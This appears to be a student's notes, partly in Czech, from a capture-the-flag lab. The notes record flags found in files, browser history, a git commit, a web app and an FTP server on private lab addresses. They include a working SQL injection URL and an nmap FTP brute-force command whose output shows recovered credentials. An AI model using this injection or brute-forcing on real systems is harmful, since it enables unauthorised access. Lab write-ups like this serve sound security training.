1 - na jimmy

[jimmy@localhost trash]$ cat .3789_2023_09_07.invoice 
Tajemstvi_A_afb0a025e207a22e8b8955b523166456a0b9f2801f41ffab50120a913e7c8c7d
[jimmy@localhost trash]$ pwd
/trash



2 - na 134

v .elinks/globhist je 

Tajemstvi_G_97873f5ef76c6514cf7c81f71c1ee4f53e2efb5bbeb5e85d9d32909b6ae82a03

[jimmy@localhost ~]$ cat .elinks/globhist 
http://192.168.122.134/user.php?id=0    http://192.168.122.134/user.php?id=0    1699908688
404 Not Found   http://192.168.122.134/upload_file.php  1699908930
Image upload    http://192.168.122.134/upload/index.php 1699909026
404 Not Found   http://192.168.122.134/upload/upload_file.txt   1699909076
http://192.168.122.134/upload/upload_file.php   http://192.168.122.134/upload/upload_file.php   1699909107
Main company management page    http://192.168.122.134/ 1699909175
Admin page      http://192.168.122.134/admin/index.html 1699909203
Secret company stuff    http://192.168.122.134/secret/  1699909367
Admin page      http://192.168.122.134/admin/   1699909372
ftp://192.168.122.164/  ftp://192.168.122.164/  1699971403
[jimmy@localhost ~]$ curl http://192.168.122.134/secret/



3 - tajemstvi na http serveru - sql injection
elinks http://192.168.122.134/user.php?id=1'+OR+1=1--'
Tajemstvi_H_6e6d348321ba3ef333b8a8ae5826060cc860496cb13c6b017b234006012ff0e8


4 - git server git://192.168.122.249

je tam repo "secret". V repu je main.c
Git show main.c vypise metadata a zmeny. Ve zmenach je tajemstvi F
Tajemstvi_F_c727260c0332918f7a1c340f8ee9ad414b71d0b8efffe9178815fd7399b00125


5 - ftp 192.168.122.164

admin
buster
posunuti o 10 doprava


student:
Dktowcdfs_N_5ol46k43kn3225m90k85nmn11mo3nn491k9l4664mk489274pm301k70ok7o398l
Tajemstvi_D_5eb46a43ad3225c90a85dcd11ce3dd491a9b4664ca489274fc301a70ea7e398b

root:
Dktowcdfs_N_00p3mlo551lkl1pm393866m48752kmp98l4443kok24o229921m84128po367m16
Tajemstvi_D_00f3cbe551bab1fc393866c48752acf98b4443aea24e229921c84128fe367c16


zkusil jsem rucne prochazet uzivatele - nasel jsem admin
nmap --script ftp-brute -p21 192.168.122.164 --script-args userdb=userftp.txt-bash-4.2$ nmap --script ftp-brute -p21 192.168.122.164 --script-args userdb=userftp.txt

Starting Nmap 6.40 ( http://nmap.org ) at 2023-11-23 07:46 UTC
Nmap scan report for 192.168.122.164
Host is up (0.00036s latency).
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute: 
|   Accounts
|     admin:buster - Valid credentials
|   Statistics
|_    Performed 145 guesses in 46 seconds, average tps: 3

Nmap done: 1 IP address (1 host up) scanned in 46.40 seconds
